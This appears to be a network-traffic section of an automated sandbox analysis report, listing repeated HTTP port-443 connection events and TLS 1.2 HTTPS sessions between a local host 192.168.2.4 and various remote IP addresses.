Source: unknown	Network traffic detected: HTTP traffic on port 64958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60951
Source: unknown	Network traffic detected: HTTP traffic on port 62948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58649
Source: unknown	Network traffic detected: HTTP traffic on port 53834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57556
Source: unknown	Network traffic detected: HTTP traffic on port 65457 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60965
Source: unknown	Network traffic detected: HTTP traffic on port 59515 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54456
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54453
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58812
Source: unknown	Network traffic detected: HTTP traffic on port 57071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54460
Source: unknown	Network traffic detected: HTTP traffic on port 62595 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58594 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54465
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54464
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57732
Source: unknown	Network traffic detected: HTTP traffic on port 63794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54468
Source: unknown	Network traffic detected: HTTP traffic on port 55006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54471
Source: unknown	Network traffic detected: HTTP traffic on port 57550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56657
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56658
Source: unknown	Network traffic detected: HTTP traffic on port 53795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61528 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56539 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56661
Source: unknown	Network traffic detected: HTTP traffic on port 57689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57990
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53394
Source: unknown	Network traffic detected: HTTP traffic on port 54249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60914
Source: unknown	Network traffic detected: HTTP traffic on port 55645 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64295
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55579
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58606
Source: unknown	Network traffic detected: HTTP traffic on port 53530 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54249
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58602
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54250
Source: unknown	Network traffic detected: HTTP traffic on port 56562 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60922
Source: unknown	Network traffic detected: HTTP traffic on port 55738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51519 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58593 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59483 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61509
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58344
Source: unknown	Network traffic detected: HTTP traffic on port 65243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61505
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61507
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57495
Source: unknown	Network traffic detected: HTTP traffic on port 57702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58597
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58593
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58592
Source: unknown	Network traffic detected: HTTP traffic on port 60965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62606
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58594
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59680
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51724
Source: unknown	Network traffic detected: HTTP traffic on port 56719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51467 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64387 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61528
Source: unknown	Network traffic detected: HTTP traffic on port 60700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59694
Source: unknown	Network traffic detected: HTTP traffic on port 55739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59587 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59458
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64801
Source: unknown	Network traffic detected: HTTP traffic on port 58857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64805
Source: unknown	Network traffic detected: HTTP traffic on port 62150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58374
Source: unknown	Network traffic detected: HTTP traffic on port 54471 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60688
Source: unknown	Network traffic detected: HTTP traffic on port 64343 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58602 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59458 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58542
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57453
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57454
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57697
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54188
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55032
Source: unknown	Network traffic detected: HTTP traffic on port 64134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60610
Source: unknown	Network traffic detected: HTTP traffic on port 64810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59638
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58545
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57699
Source: unknown	Network traffic detected: HTTP traffic on port 56455 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61509 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56133
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58797
Source: unknown	Network traffic detected: HTTP traffic on port 64295 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54192
Source: unknown	Network traffic detected: HTTP traffic on port 54974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54191
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60866
Source: unknown	Network traffic detected: HTTP traffic on port 60951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58556
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58322
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59652
Source: unknown	Network traffic detected: HTTP traffic on port 61797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61967
Source: unknown	Network traffic detected: HTTP traffic on port 64377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59892
Source: unknown	Network traffic detected: HTTP traffic on port 57746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60409
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58575
Source: unknown	Network traffic detected: HTTP traffic on port 59827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63913
Source: unknown	Network traffic detected: HTTP traffic on port 49450 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56559 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58606 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49450
Source: unknown	Network traffic detected: HTTP traffic on port 64814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63368 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64659 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63774
Source: unknown	Network traffic detected: HTTP traffic on port 53394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64866
Source: unknown	Network traffic detected: HTTP traffic on port 62892 -> 443

Source: unknown	HTTPS traffic detected: 172.67.215.49:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.185.93:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.50.191.95:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.250.2.254:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.215.61.44:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:52270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:53849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.183.254:443 -> 192.168.2.4:54421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.107:443 -> 192.168.2.4:53819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.69.169:443 -> 192.168.2.4:53844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:53818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.201.182.85:443 -> 192.168.2.4:52263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:54327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:54760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:54964 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.124.249.58:443 -> 192.168.2.4:54257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:54973 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:54382 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:53889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:54266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.229.226.96:443 -> 192.168.2.4:53891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.126.94.219:443 -> 192.168.2.4:53795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.186.33.19:443 -> 192.168.2.4:53817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:54460 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:54972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:54945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.59.243.225:443 -> 192.168.2.4:54937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.171:443 -> 192.168.2.4:54377 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.252.151.25:443 -> 192.168.2.4:55030 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.168.67.138:443 -> 192.168.2.4:54974 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:55006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:53892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:54468 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:54417 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.194.166.146:443 -> 192.168.2.4:54967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:55265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:55016 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.98.192.36:443 -> 192.168.2.4:55194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:55014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:54464 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 66.254.66.55:443 -> 192.168.2.4:54453 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.90.51.60:443 -> 192.168.2.4:54303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 68.178.145.3:443 -> 192.168.2.4:53815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.42.111.169:443 -> 192.168.2.4:54888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.108.50:443 -> 192.168.2.4:55133 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.182.195.165:443 -> 192.168.2.4:54418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 156.38.230.76:443 -> 192.168.2.4:55032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 218.213.216.3:443 -> 192.168.2.4:56098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 183.111.174.109:443 -> 192.168.2.4:55653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:56696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:56253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:57065 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:57068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:57064 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:57069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:57066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:57067 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:57071 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:57556 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:57619 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:57073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.91.197.26:443 -> 192.168.2.4:55034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:57550 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:57682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:57978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:57746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:57732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.108.50:443 -> 192.168.2.4:57715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:57611 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:58322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:58504 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:58454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:58542 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:58593 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:57990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:58594 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:58592 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:58602 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:58606 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:58451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:58597 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:58545 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:59247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:59587 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:59458 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:59638 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:59473 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:59700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.46:443 -> 192.168.2.4:59596 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:59827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:60409 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:60698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:60700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:60922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:60914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:61009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:60936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:60965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.124.80.122:443 -> 192.168.2.4:61033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:60951 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:61318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:61507 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:61509 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:61528 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:61505 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:61499 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:61797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:61849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:61857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:61800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:61664 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:61878 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:61923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:61918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:61877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:62110 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.162.89.66:443 -> 192.168.2.4:62037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:61967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:62126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:62155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:62164 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:62148 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:62150 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 141.193.213.10:443 -> 192.168.2.4:62369 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.155.237:443 -> 192.168.2.4:62161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.146.69.50:443 -> 192.168.2.4:62595 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.68.191.221:443 -> 192.168.2.4:62796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.166.123:443 -> 192.168.2.4:62892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.197.165.27:443 -> 192.168.2.4:62637 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:62967 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 167.235.0.29:443 -> 192.168.2.4:63036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.168.2.4:63036 -> 167.235.0.29:443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.17.71.73:443 -> 192.168.2.4:63352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:63368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:63772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:63774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.80:443 -> 192.168.2.4:63844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:63776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:63837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 69.42.204.12:443 -> 192.168.2.4:63794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.4:63842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.194.166.146:443 -> 192.168.2.4:63816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:64102 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.31.65.5:443 -> 192.168.2.4:64146 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.136.28.237:443 -> 192.168.2.4:64134 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.24.82.4:443 -> 192.168.2.4:64191 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64377 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64387 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.132.253.137:443 -> 192.168.2.4:64295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.197.30.48:443 -> 192.168.2.4:64331 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.35.116.12:443 -> 192.168.2.4:64649 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.4:64659 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.4:64658 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.0.173:443 -> 192.168.2.4:64795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.206.39.153:443 -> 192.168.2.4:64801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.6.37:443 -> 192.168.2.4:64866 version: TLS 1.2
